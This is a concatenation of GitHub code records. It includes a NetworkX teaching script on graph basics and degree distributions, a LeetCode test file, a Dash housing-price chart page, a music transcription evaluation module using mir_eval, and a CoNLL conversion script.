os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'Networks_and_Computers/Code/Student_version'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n\nfrom IPython import get_ipython\n\n# ================================================================================\n# Importing required modules\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n# get_ipython().run_line_magic('matplotlib', 'inline')\n\n# ================================================================================\n# change defaults to be less ugly\nmpl.rc('xtick', labelsize=14, color=\"#222222\") \nmpl.rc('ytick', labelsize=14, color=\"#222222\") \nmpl.rc('font', **{'family':'sans-serif','sans-serif':['Arial']})\nmpl.rc('font', size=16)\nmpl.rc('xtick.major', size=6, width=1)\nmpl.rc('xtick.minor', size=3, width=1)\nmpl.rc('ytick.major', size=6, width=1)\nmpl.rc('ytick.minor', size=3, width=1)\nmpl.rc('axes', linewidth=1, edgecolor=\"#222222\", labelcolor=\"#222222\")\nmpl.rc('text', usetex=False, color=\"#222222\")\n\n# ================================================================================\n# NetworkX provides the following \"classes\" (that represent network-related data)\n# as well as \"network analysis algorithms\" (that operate on these objects):\n\n# Graph - Undirected graph with self loops\n# DiGraph - Directed graph with self loops\n# MultiGraph - Undirected Graph with self loops and multiple edges\n# MultiDiGraph - Directed Graph with self loops and multiple edges\n\n# ================================================================================\nprint(nx.__version__)\n# 2.3\n\n# ================================================================================\n# Create an \"empty\", \"undirected\" network\n\nG = nx.Graph()\n\n# ================================================================================\n# Nodes can be almost anything (numbers, strings, GPS coordinates, etc)\n# Nodes can be added one at a time:\n\n# Add \"0 node\" to \"graph G\"\nG.add_node(0)\n\n# Add \"John node\" to \"graph G\"\nG.add_node(\"John\")\n\n# tuple object representing, say, longitude and latitude\npos = (1.2, 3.4) \nG.add_node(pos)\n\n# ...or many at once from a python container\n# [1,2,3] is a list containing 1, 2, 3\nG.add_nodes_from([1, 2, 3])\n\n# ================================================================================\n# Nodes can have arbitrary attributes (which are associated with nodes), (which are contained in a string-index dictionary)\n\n# Add \"Louis node\" + \"Attributes of node\"\nG.add_node(\"Louis\", eye_color='blue', height=6)\n\n# Add \"Laszlo node\"\nG.add_node(\"Laszlo\")\n# Add \"attributes\" to an \"existing node\"\nG.nodes[\"Laszlo\"][\"citations\"] = 10**6\n\n# ================================================================================\n# Get values from nodes\n\nLouis_node_eye_color_attribute=G.nodes[\"Louis\"][\"eye_color\"]\nLouis_node_height_attribute=G.nodes['Louis']['height']\nLaszlo_node_citations_attribute=G.nodes[\"Laszlo\"][\"citations\"]\n# print(\"Louis_node_eye_color_attribute\",Louis_node_eye_color_attribute)\n# print(\"Louis_node_height_attribute\",Louis_node_height_attribute)\n# print(\"Laszlo_node_citations_attribute\",Laszlo_node_citations_attribute)\n# blue\n# 6\n# 1000000\n\n# ================================================================================\n# An edge between node1 and node2: (node1, node2) \n\n# Edges can be added one at a time\n\n# Add \"edge\" between \"node 0\" and \"node 1\"\nG.add_edge(0, 1)\n\n# ================================================================================\n# Add \"multiple edges\" \n\nedge_list = [ (2, 1), (\"Louis\", \"Laszlo\"), (3, 4) ]\nG.add_edges_from(edge_list)\n\n# ================================================================================\n# \"Nodes\" will be \"automatically created\" if nodes don't already exist.\n\n# ================================================================================\n# Edge attributes\n\n# Edges can have arbitrary attributes. \n\n# ================================================================================\n# Add \"edge ('Louis', 'Sebastian')\" + \"edge attribute weight=10\"\nG.add_edge(\"Louis\", \"Sebastian\", weight=10)\n\nG.add_edge(\"Hopkinton\", \"Boston\")\nG.edges[\"Hopkinton\", \"Boston\"]['distance'] = 26.2\n\n# ================================================================================\n# Basic operations\n\n# ================================================================================\n# Size of the network\n\n# number of nodes of \"graph G\"\n# print(\"G.number_of_nodes()\",G.number_of_nodes())\n# 12\n\n# number of nodes of \"graph G\"\n# print(\"len(G)\",len(G))\n# 12\n\n# number of edges of \"graph G\"\n# print(\"G.number_of_edges()\",G.number_of_edges())\n# 6\n\n# number of edges of \"graph G\"\n# print(\"G.size()\",G.size())\n# 6\n\n# ================================================================================\n# How to see whether \"nodes\" exist\nres=G.has_node(\"Louis\")\n# print(\"res\",res)\n# True\n\n# How to see whether \"nodes\" exist\nres=\"Sebastian\" in G\n# print(\"res\",res)\n# True\n\n# ================================================================================\n# How to see whether \"edges\" exist\n\nret=G.has_edge(3, 4)\n# print(\"ret\",ret)\n# True\n\nret=G.has_edge(\"Louis\", 0)\n# print(\"ret\",ret)\n# False\n\n# ================================================================================\n# How to find neighbaors of a node\n\nneighbors_of_node_1_in_graph_G=list(G.neighbors(1))\n# print(\"neighbors_of_node_1_in_graph_G\",neighbors_of_node_1_in_graph_G)\n# [0, 2]\n\n# ================================================================================\n# * In `DiGraph` objects, `G.neighbors(node)` gives the successors of `node`, as does `G.successors(node)` \n# * Predecessors of `node` can be obtained with `G.predecessors(node)`\n\n# ================================================================================\n# How to iterate over nodes using G.nodes()\n\n# for node, data in G.nodes(data=True): # data=True includes \"node attributes\" as dictionaries\n# print(node)\n# print(data)\n# print(\"\")\n\n# ================================================================================\n# How to iterate over edges using G.edges()\n\n# for n1, n2, data in G.edges(data=True):\n# print([n1,n2])\n# print(data)\n# print(\"\")\n\n# ================================================================================\n# Calculate degrees\n\ndegree_of_node_Louis=G.degree(\"Louis\")\n# print(\"degree_of_node_Louis\",degree_of_node_Louis)\n\ndegree_of_all_nodes_in_graph_G=G.degree()\n# print(\"degree_of_all_nodes_in_graph_G\",degree_of_all_nodes_in_graph_G)\n# [(0, 1), ('John', 0), ((1.2, 3.4), 0), (1, 2), (2, 1), (3, 1), ('Louis', 2), ('Laszlo', 1), (4, 1), ('Sebastian', 1), ('Hopkinton', 1), ('Boston', 1)]\n\ndegree_of_all_nodes_list=[]\nfor one_node in G:\n degree_of_one_node=G.degree(one_node)\n degree_of_all_nodes_list.append(degree_of_one_node)\n# print(\"degree_of_all_nodes_list\",degree_of_all_nodes_list)\n# [1, 0, 0, 2, 1, 1, 2, 1, 1, 1, 1, 1]\n\n# ================================================================================\n# In directed graphs (DiGraph), there are two types of degree.\n\n# in_degree_of_node=directed_graph_G.in_degree(node)\n# out_degree_of_node=directed_graph_G.out_degree(node)\n# out_degree_of_node=directed_graph_G.degree()\n\n# ================================================================================\n# Other operations\n\n# ================================================================================\n# subgraph of graph G, (which are induced by nodes in nbunch)\n# subgraph(G,nbunch)\n# G.subgraph(nbunch)\n\n# ================================================================================\n# DiGraph (with edges reversed )\n# reverse(G)\n\n# ================================================================================\n# union of 2 graphs\n# union(G1, G2)\n\n# ================================================================================\n# same, but treats nodes of G1, G2 as different \n# disjoint_union(G1, G2)\n\n# ================================================================================\n# \"result graph\" with only the \"edges in common\" between G1, G2\n# intersection(G1, G2)\n\n# ================================================================================\n# \"result graph\" with only the \"edges G1 that aren't in G2\"\n# difference(G1, G2)\n\n# ================================================================================\n# copy of G\n# copy(G) or G.copy()\n\n# ================================================================================\n# the complement graph of graph G \n# complement(G) or G.complement()\n\n# ================================================================================\n# undirected version of graph G (a Graph or MultiGraph)\n# convert_to_undirected(G) or G.to_undirected()\n\n# ================================================================================\n# directed version of G (a DiGraph of MultiDiGraph)\n# convert_to_directed(G) or G.to_directed()\n\n# ================================================================================\n# \"adjacency matrix A\" of graph G (in sparse matrix format; to get full matrix, use A.toarray())\n# adjacency_matrix(G)\n\n# ================================================================================\n# @ Graph I/O\n\n# ================================================================================\n# NetworkX can understand the following common graph formats:\n\n# edge lists\n# adjacency lists\n# GML\n# GEXF\n# Python 'pickle'\n# GraphML\n# Pajek\n# LEDA\n# YAML\n\n# ================================================================================\n# Getting started: \"reading in\" an \"edge list\"\n\n# \"Read in\" the file with the \"options\"\n# comments='#': lines starting with `#` are treated as comments and ignored \n# create_using=nx.Graph(): use a \"Graph object\" to hold the data (i.e., network is undirected) \n# delimiter=' ': data are separated by whitespace\n# nodetype=int: nodes should be treated as integers\n# encoding='utf-8': encoding of the text file containing the edge list is utf-8\n\n# \"read in\" an \"edge list\" from the file 'test.txt'\nG = nx.read_edgelist('./test.txt', comments='#', create_using=nx.Graph(), delimiter=' ', nodetype=int, encoding='utf-8')\n\n# ================================================================================\n# Allowed formats in \"edge list file\"\n\n# - Node pairs with no data \n# 1 2\n\n# - Node pairs with python dictionary \n# 1 2 {weight:7, color:\"green\"}\n\n# ================================================================================\n# Basic analysis\n\n# A large number of basic analyses can be done using\n# - NetworkX + numpy\n# - builtin python functions like min, max, etc\n\n# ================================================================================\n# Number of nodes\nN = len(G)\n# print(\"N\",N)\n# N 443\n\n# Number of edges\nL = G.size()\n# print(\"L\",L)\n# L 540\n\n# ================================================================================\ndegrees = [G.degree(node) for node in G]\n# print(\"degrees\",degrees)\n# degrees [5, 2, 5, 5, 4,\n\n# print(\"Average degree: \", 2*L/N)\n# print(\"Average degree (alternate calculation)\", np.mean(degrees))\n# 2.4379232505643342\n# 2.4379232505643342\n\n# Minimum degree\nkmin = min(degrees)\n# print(\"kmin\",kmin)\n# kmin 1\n\n# Maximum degree\nkmax = max(degrees)\n# print(\"kmax\",kmax)\n# kmax 8\n\n# ================================================================================\n# @ Drawing the network\n\n# using the \"force-based\" or \"spring\" layout algorithm\n# fig = plt.figure(figsize=(8,8))\n# plt.title(\"undirected graph G \\n node point size=10 \\n draw this by using draw_spring()\")\nnx.draw_spring(G, node_size=10)\n# plt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_09:09:27.png\n\n# ================================================================================\n# using the fcircular layout algorithm\n# fig = plt.figure(figsize=(8,8))\n# plt.title(\"undirected graph G \\n node point size=10 \\n draw this by using draw_circular()\")\nnx.draw_circular(G, node_size=10)\n# plt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_09:11:28.png\n\n# ================================================================================\n# Plotting the degree distribution\n\n# Let's plot \"degree distribution\" in \"log scale\" first\n\n# numpy can be used to get \"logarithmically-spaced bins\" between the minimum and maximum degree\n\n# Get \"10 logarithmically spaced bins\" between kmin and kmax\nbin_edges = np.logspace(np.log10(kmin), np.log10(kmax), num=10)\n# print(\"bin_edges\",bin_edges)\n# [1. 1.25992105 1.58740105 2. 2.5198421 3.1748021 4. 5.0396842 6.34960421 8. ]\n\n# histogram the data into these bins\ndensity, _ = np.histogram(degrees, bins=bin_edges, density=True)\n\n# ================================================================================\nfig = plt.figure(figsize=(6,4))\n\nlog_be = np.log10(bin_edges)\n# print(\"log_be\",log_be)\n# [0. 0.10034333 0.20068666 0.30103 0.40137333 0.50171666 0.60205999 0.70240332 0.80274666 0.90308999]\n\n# \"x\" should be midpoint (IN LOG SPACE) of each bin\nx = 10**((log_be[1:] + log_be[:-1])/2)\n# print(\"x\",x)\n# [1.12246205 1.41421356 1.78179744 2.2449241 2.82842712 3.56359487 4.48984819 5.65685425 7.12718975]\n\nplt.loglog(x, density, marker='o', linestyle='none')\nplt.title(\"probability distribution of degree k in log domain\")\nplt.xlabel(r\"degree $k$\", fontsize=16)\nplt.xlabel(r\"degree $k$\", fontsize=16)\nplt.ylabel(r\"$P(k)$: probability of degree $k$ occuring\", fontsize=16)\n\n# remove right and top boundaries because they're ugly\nax = plt.gca()\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.yaxis.set_ticks_position('left')\nax.xaxis.set_ticks_position('bottom')\n\n# Show the plot\n# plt.show()\n\n# ================================================================================\n# This is clearly not a network withe anything like a heavy-tailed or power law degree distribution.\n\n# ================================================================================\n# Let's also plot it in linear-linear scale.\n\n# The `linspace` command in `numpy` is used to get linearly-spaced numbers between two extremes\n\n\n# Get 20 logarithmically spaced bins between kmin and kmax\nbin_edges = np.linspace(kmin, kmax, num=10)\n\n# histogram the data into these bins\ndensity, _ = np.histogram(degrees, bins=bin_edges, density=True)\n\n# ================================================================================\n# plot it\n\nfig = plt.figure(figsize=(6,4))\n\nlog_be = np.log10(bin_edges)\n\n# \"x\" should be midpoint (IN LOG SPACE) of each bin\nx = 10**((log_be[1:] + log_be[:-1])/2)\n\nplt.plot(x, density, marker='o', linestyle='none')\nplt.title(\"probability distribution of degree k in linear-linear scale\")\nplt.xlabel(r\"degree $k$\", fontsize=16)\nplt.ylabel(r\"$P(k)$: probability of degree $k$ occuring\", fontsize=16)\n\n# remove right and top boundaries because they're ugly\nax = plt.gca()\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.yaxis.set_ticks_position('left')\nax.xaxis.set_ticks_position('bottom')\n\nplt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_10:07:44.png\n\n# ================================================================================\n# Hands-on exercise\n\n# Now split into 6 groups, 3 for `example_1.txt` and 3 for `example_2.txt`. Each group should read in their edge\n\n# list file and do the following:\n\n# * Group 1: Do the basic measurements shown above. What can you suspect about the degree distribution of the network just based on the average and extremes in degree?\n\n# * Group 2: Plot the degree distribution in log-log scale. Also plot it in linear scale. Comment on how this fits with the analysis of Group 1.\n\n# * Group 3: Draw the network using the two layout algorithms shown above. How does the the network's appearance echo the findings of groups 1 and 2?\n\n","repo_name":"youngminpark2559/medicine","sub_path":"network_medicine/barabasilab.com_course/00006_Networks_and_Computers/Code/Student_version/networks_and_computers_handson1.py","file_name":"networks_and_computers_handson1.py","file_ext":"py","file_size_in_byte":16102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34827114288","text":"import unittest\nimport solutions._contest.weekly_168.index as main\n\n\nclass Test(unittest.TestCase):\n def test_isPossibleDivide(self):\n test_patterns = [\n ([3, 2, 1, 2, 3, 4, 3, 4, 5, 9, 10, 11], 3, True),\n ]\n\n for i, (arg1, arg2, expected) in enumerate(test_patterns):\n with self.subTest(test=i):\n s = main.Solution()\n # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n self.assertEqual(s.isPossibleDivide(arg1, arg2), expected)\n\n def test_maxFreq(self):\n test_patterns = [\n (\"aababcaab\", 2, 3, 4, 2),\n (\"aaaa\", 1, 3, 3, 2),\n (\"aabcabcab\", 2, 2, 3, 3),\n (\"abcde\", 2, 3, 3, 0)\n ]\n\n for i, (arg1, arg2, arg3, arg4, expected) in enumerate(test_patterns):\n with self.subTest(test=i):\n s = main.Solution()\n # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n self.assertEqual(s.maxFreq(arg1, arg2, arg3, arg4), expected)\n\n # def test_maxCandies(self):\n # test_patterns = [\n # # ([1, 0, 1, 0], [7, 5, 4, 100], [\n # # [], [], [1], []], [[1, 2], [3], [], []], [0], 16),\n # # ([1, 0, 0, 0, 0, 0],\n # # [1, 1, 1, 1, 1, 1],\n # # [[1, 2, 3, 4, 5], [], [], [], [], []],\n # # [[1, 2, 3, 4, 5], [], [], [], [], []],\n # # [0],\n # # 6\n # # ),\n # ([1, 0, 0, 0],\n # [1, 2, 3, 4],\n # [[1, 2], [3], [], []],\n # [[2], [3], [1], []],\n # [0], 10)\n # ]\n\n # for i, (arg1, arg2, arg3, arg4, arg5,\n # expected) in enumerate(test_patterns):\n # with self.subTest(test=i):\n # s = main.Solution()\n # # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n # self.assertEqual(\n # s.maxCandies(\n # arg1,\n # arg2,\n # arg3,\n # arg4,\n # arg5),\n # expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nk18chi/leetcode-python","sub_path":"solutions/_contest/weekly_168/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"37214037438","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom data_loaders import CityHousesLoader\nfrom data_loaders import HousesParameters as house_params\nfrom plotly import graph_objects as go\n\nfrom .base_houses_prices_page import BaseHousesPricesPage\n\n\nclass CityHousesKeys:\n CITY_DROPDOWN = \"CITY_DROPDOWN\"\n GRAPH = \"GRAPH\"\n OFFER_LINK = \"OFFER_LINK\"\n AREA_SLIDER = \"AREA_SLIDER\"\n DATE_PICKER = \"DATE_PICKER\"\n PRICE_FROM = \"PRICE_FROM\"\n PRICE_TO = \"PRICE_TO\"\n\n\nclass CityHousesPage(BaseHousesPricesPage):\n data_loader = CityHousesLoader()\n KEYS = CityHousesKeys()\n\n @classmethod\n def register_callbacks(cls, app):\n @app.callback(\n Output(cls.KEYS.GRAPH, \"figure\"),\n [\n Input(cls.KEYS.DATE_PICKER, \"start_date\"),\n Input(cls.KEYS.DATE_PICKER, \"end_date\"),\n Input(cls.KEYS.CITY_DROPDOWN, \"value\"),\n Input(cls.KEYS.PRICE_FROM, \"value\"),\n Input(cls.KEYS.PRICE_TO, \"value\"),\n Input(cls.KEYS.AREA_SLIDER, \"value\"),\n ],\n )\n def callback_update_figure(start_date, end_date, city_value, price_from, price_to, area):\n cls._update_param(house_params.START_DATE, start_date)\n cls._update_param(house_params.END_DATE, end_date)\n cls._update_param(house_params.CITY, city_value)\n cls._update_param(house_params.PRICE_FROM, price_from)\n cls._update_param(house_params.PRICE_TO, price_to)\n areas = cls._get_areas_options()\n cls._update_param(house_params.AREA, [areas[area[0]], areas[area[1]]])\n return cls._get_graph()\n\n @app.callback(Output(cls.KEYS.OFFER_LINK, \"href\"), Input(cls.KEYS.GRAPH, \"clickData\"))\n def display_click_data(clickData):\n if clickData:\n return clickData[\"points\"][0].get(\"text\")\n\n @classmethod\n def _get_graph(cls):\n data = cls.dataframe.get(\"plain\")\n return cls._make_bar(data, \"City house offers with their prices\")\n\n @classmethod\n def _make_bar(cls, data, title):\n color = {\"Aftermarket\": \"pink\", \"Primary market\": \"deeppink\"}\n data[\"index\"] = list(range(len(data)))\n fig = go.Figure()\n for lbl in data[\"market\"].unique():\n dfp = data[data[\"market\"] == lbl]\n fig.add_traces(\n go.Bar(\n x=dfp[\"index\"],\n y=dfp[\"price\"],\n name=lbl,\n marker=dict(color=color[lbl]),\n customdata=data[\"name\"],\n text=data[\"website\"],\n )\n )\n\n fig.update_traces(\n marker_line_width=0,\n hovertemplate=\"Name:%{customdata}
        %{x}
        Price:%{y}
        www: %{text} \",\n showlegend=True,\n )\n fig.update_layout(\n clickmode=\"event+select\",\n title_text=title,\n title_font=dict(\n size=20,\n color=\"rgb(101, 102, 148)\",\n ),\n font_color=\"rgb(82, 83, 130)\",\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n xaxis=dict(\n title=\"House offer\",\n showticklabels=True,\n tickvals=data[\"index\"],\n ticktext=data[\"datetime\"],\n ticklen=20,\n dtick=1,\n ticks=\"inside\",\n tickfont=dict(color=\"crimson\", size=6),\n ),\n yaxis=dict(\n title=\"Offer price\",\n showgrid=False,\n zeroline=False,\n ),\n )\n return fig\n","repo_name":"Riwuko/housestats","sub_path":"app/pages/city_houses_page.py","file_name":"city_houses_page.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21544085280","text":"import mir_eval\nimport numpy as np\n\n\nfrom . import Data\n\ndef _listOfListToTuple(nested_list):\n return [tuple(l) for l in nested_list]\n\ndef compareBracket(intervalEst, intervalGT):\n nGT = len(intervalGT)\n nEst = len(intervalEst)\n\n \n nUnion = len(set(_listOfListToTuple(intervalEst+ intervalGT)))\n nCorrect = nGT+nEst-nUnion\n\n return nGT, nEst, nCorrect\n \n\ndef intersectTwoInterval(intervalA, intervalB):\n l = max(intervalA[0], intervalB[0])\n r = min(intervalA[1], intervalB[1])\n return (l,r)\n\ndef findIntersectListOfIntervals(listA, listB):\n i = 0\n j = 0\n result = []\n while i=l:\n # check if (l,r) can be merged into the previous one\n if len(result)>0 and result[-1][1] == l:\n result[-1] = (result[-1][0],r)\n else:\n result.append((l,r))\n \n if listA[i][1] < listB[j][1]:\n i = i+1\n else:\n j = j+1\n\n \n \n return result\n\n\n \ndef computeIntervalLengthSum(intervals, countZero=True):\n s = 0\n if countZero:\n prevEnd = -1\n for e in intervals:\n s+= e[1]-e[0]\n if prevEnd < e[0]:\n s+= 1\n\n prevEnd = e[1]\n else:\n for e in intervals:\n s+= e[1]-e[0]\n\n return s\n\n\ndef compareFramewise(intervalEst, intervalGT, countZero=True):\n nEst = computeIntervalLengthSum(intervalEst, countZero)\n nGT = computeIntervalLengthSum(intervalGT, countZero)\n intersected = findIntersectListOfIntervals(intervalEst,intervalGT)\n nIntersected = computeIntervalLengthSum(intersected, countZero)\n nUnion = nGT+nEst- nIntersected\n\n return nGT,nEst, nIntersected\n\n\n\n\ndef midi_to_freq(midi):\n if midi>=0:\n freq = 2**((midi -69)/12)*440\n else:\n # tricks for pedals\n freq = 2**((-midi -69)/12)*440*100\n return freq\ndef getSpan(eventList):\n r = max([e.end for e in eventList])\n return r\n\n\ndef computeFrameScore(estimated, gt, eventTypes):\n # by default step is 0.01 to make it aligned with most papers\n\n # len(eventTypes)\n\n # eventTypes = set([e.pitch for e in estimated] +\n # [gt.pitch for e in estimated])\n\n if len(estimated)==0 or len(gt)==0:\n return 0,0,0\n\n\n\n\n intervalsA = Data.prepareIntervalsNoQuantize(estimated, eventTypes)[\"intervals\"]\n intervalsB = Data.prepareIntervalsNoQuantize(gt, eventTypes)[\"intervals\"]\n assert(len(intervalsA) == len(eventTypes))\n assert(len(intervalsB) == len(eventTypes))\n\n nGT = 0\n nEst = 0\n nCorrect = 0\n\n for IA, IB in zip(intervalsA, intervalsB):\n\n cur_nGT, cur_nEst, cur_nCorrect = compareFramewise(IA, IB, countZero=False)\n # print(compareFramewise(IA, IB))\n nGT += cur_nGT\n nEst += cur_nEst\n nCorrect += cur_nCorrect\n\n p = nCorrect/(nEst+1e-8)\n r = nCorrect/(nGT+1e-8)\n f = 2*nCorrect/(nEst+ nGT+1e-8)\n o = nCorrect/(nEst+nGT-nCorrect+1e-8)\n\n return p,r,f,o\n \n\n\ndef compareMatchedDeviations(estimated, gt, splitPedal):\n resultEst, pedalEst = prepareDataForEvaluation(estimated, splitPedal=splitPedal)\n resultGT, pedalGT= prepareDataForEvaluation(gt, splitPedal=splitPedal)\n\n metrics = dict()\n\n\n matched = mir_eval.transcription.match_notes(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n onset_tolerance = 0.1,\n offset_min_tolerance = 0.1\n )\n\n \n # compute deviations \n deviations = []\n for idxGT, idxEst in matched:\n intervalGT = resultGT[\"intervals\"][idxGT]\n intervalEST = resultEst[\"intervals\"][idxEst]\n curDiff = intervalGT-intervalEST\n deviations.append(curDiff)\n\n return deviations \n\n\ndef compareTranscription(estimated, gt, splitPedal=False, computeDeviations = False, **kwargs):\n\n\n # convert data into the format mir_eval use \n\n resultEst, pedalEst = prepareDataForEvaluation(estimated, splitPedal=splitPedal)\n resultGT, pedalGT= prepareDataForEvaluation(gt, splitPedal=splitPedal)\n\n # print(resultEst)\n\n # compute framewise (pitch activation level) note level score (onest, onset+ offset, onset+offset+velocity) also evaluate pedal individually\n\n metrics = dict()\n # 1. framewise score (pitch activation level score)\n # computeFrameScore\n\n\n metrics[\"frame\"] = computeFrameScore(estimated, gt, eventTypes = list(range(21,108+1)))\n \n\n \n nGT = resultGT[\"intervals\"].shape[0]\n nEst = resultEst[\"intervals\"].shape[0]\n\n\n # 2. note onset \n\n\n metrics[\"note\"] = mir_eval.transcription.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n offset_ratio = None,\n **kwargs\n )\n\n metrics[\"note+velocity\"] = mir_eval.transcription_velocity.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultGT[\"velocities\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n resultEst[\"velocities\"],\n offset_ratio = None,\n **kwargs\n )\n \n # 3. note onset + offset \n metrics[\"note+offset\"] = mir_eval.transcription.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n **kwargs\n )\n\n # note onset + offset + velocity\n metrics[\"note+velocity+offset\"] = mir_eval.transcription_velocity.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultGT[\"velocities\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n resultEst[\"velocities\"],\n **kwargs\n )\n \n metrics[\"nGT\"] = nGT\n metrics[\"nEst\"] = nEst\n\n # deviations of matched notes\n if computeDeviations:\n matched = mir_eval.transcription.match_notes(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n onset_tolerance = 0.1,\n offset_min_tolerance = 0.1\n )\n\n # compute deviations \n deviations = []\n for idxGT, idxEst in matched:\n intervalGT = resultGT[\"intervals\"][idxGT]\n intervalEST = resultEst[\"intervals\"][idxEst]\n curDiff = intervalGT-intervalEST\n deviations.append(curDiff.tolist())\n\n metrics[\"deviations\"] = deviations\n\n\n if len(pedalEst)>0:\n # evaluate pedals\n\n for cc in pedalEst:\n curEst = pedalEst[cc]\n curGT = pedalGT[cc]\n nGTPedal = curGT[\"intervals\"].shape[0]\n nEstPedal = curEst[\"intervals\"].shape[0]\n\n if nGTPedal>0:\n metrics[\"pedal\"+str(cc)+\"frame\"] = computeFrameScore(estimated, gt, eventTypes =[-cc] )\n metrics[\"pedal\"+str(cc)] = mir_eval.transcription.precision_recall_f1_overlap(\n curGT[\"intervals\"],\n curGT[\"pitches\"],\n curEst[\"intervals\"],\n curEst[\"pitches\"],\n offset_ratio = None,\n **kwargs\n )\n\n metrics[\"pedal\"+str(cc) +\"+offset\"] = mir_eval.transcription.precision_recall_f1_overlap(\n curGT[\"intervals\"],\n curGT[\"pitches\"],\n curEst[\"intervals\"],\n curEst[\"pitches\"],\n **kwargs\n )\n\n metrics[\"pedal\"+str(cc)+\"nGT\"] = nGTPedal \n metrics[\"pedal\"+str(cc)+\"nEst\"] = nEstPedal \n \n\n\n # each entry has (precision, recall, f1, average overlap ratio)\n\n return metrics\n\n\n\n\n\ndef prepareDataForEvaluation(notes, ccList = [64,67], splitPedal=False):\n # convert notes to \n # intervals: np.ndarray shape = (n, 2) \n # pitches: np.ndarray shape = (n,), in Hz\n # velocities: np.ndarray shape=(n,) between 0- 127\n\n \n\n # filter out unsupported symbols\n notes = [n for n in notes if -n.pitch in ccList or n.pitch>=0]\n\n\n if splitPedal:\n intervals = np.array([[n.start, n.end] for n in notes if n.pitch>=0])\n pitches = np.array([midi_to_freq(n.pitch) for n in notes if n.pitch>=0])\n velocities = np.array([n.velocity for n in notes if n.pitch>=0])\n else:\n intervals = np.array([[n.start, n.end] for n in notes])\n pitches = np.array([midi_to_freq(n.pitch) for n in notes])\n velocities = np.array([n.velocity for n in notes])\n\n if intervals.shape == (0,):\n intervals = np.zeros(shape= (0,2))\n # for pedal, we group all pedals individually\n\n pedals = dict()\n\n for cc in ccList:\n\n intervals_pedal = np.array([[n.start, n.end] for n in notes if n.pitch==-cc])\n pitches_pedal = np.array([1 for n in notes if n.pitch==-cc])\n velocities_pedal = np.array([n.velocity for n in notes if n.pitch==-cc])\n\n if intervals_pedal.shape == (0,):\n intervals_pedal = np.zeros(shape= (0,2))\n\n curResult = { \"intervals\": intervals_pedal,\n \"pitches\": pitches_pedal,\n \"velocities\": velocities_pedal\n }\n pedals[cc] = curResult\n \n result = { \"intervals\": intervals,\n \"pitches\": pitches,\n \"velocities\": velocities\n }\n\n return result, pedals\n \n\n","repo_name":"Yujia-Yan/Skipping-The-Frame-Level","sub_path":"transkun/Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":9746,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"68"} +{"seq_id":"20837777428","text":"#!/usr/bin/env python\r\n# coding=utf-8\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport codecs\r\nimport sys\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser('convert conll file to input format')\r\n parser.add_argument(\"--input\", help=\"path to input file\", default=\"\")\r\n parser.add_argument(\"--output\", help=\"path to output file\", default=\"\")\r\n args = parser.parse_args()\r\n\r\n if args.input == \"\":\r\n print(\"input file needed\", file=sys.stderr)\r\n sys.exit(1)\r\n if args.output == \"\":\r\n print(\"output file needed\", file=sys.stderr)\r\n sys.exit(1)\r\n if args.input == args.output:\r\n print(\"input and output cannot be the same\", file=sys.stderr)\r\n sys.exit(1)\r\n\r\n output_file = codecs.open(args.output, \"w\", encoding='utf-8')\r\n\r\n try:\r\n sent = []\r\n for line in codecs.open(args.input, \"r\", encoding='utf-8'):\r\n line = line.strip()\r\n if len(line) == 0:\r\n print(u' '.join(u'{0}_{1}'.format(word, postag) for word, postag in sent), file=output_file)\r\n sent = []\r\n else:\r\n fields = line.split()\r\n word, postag = fields[1], fields[3]\r\n sent.append((word, postag))\r\n if len(sent) > 0:\r\n print(u' '.join(u'{0}_{1}'.format(word, postag) for word, postag in sent), file=output_file)\r\n finally:\r\n output_file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Oneplus/segerrparsing","sub_path":"src/conll_to_posdat.py","file_name":"conll_to_posdat.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"14761314907","text":"import xmlrpc.client\r\nimport time\r\nimport datetime\r\nimport threading\r\nimport prctl\r\nimport serial\r\nimport schedule\r\nimport sys\r\nimport logging\r\nfrom systemd.journal import JournalHandler\r\nimport urllib3\r\nfrom subprocess import PIPE, Popen\r\nimport 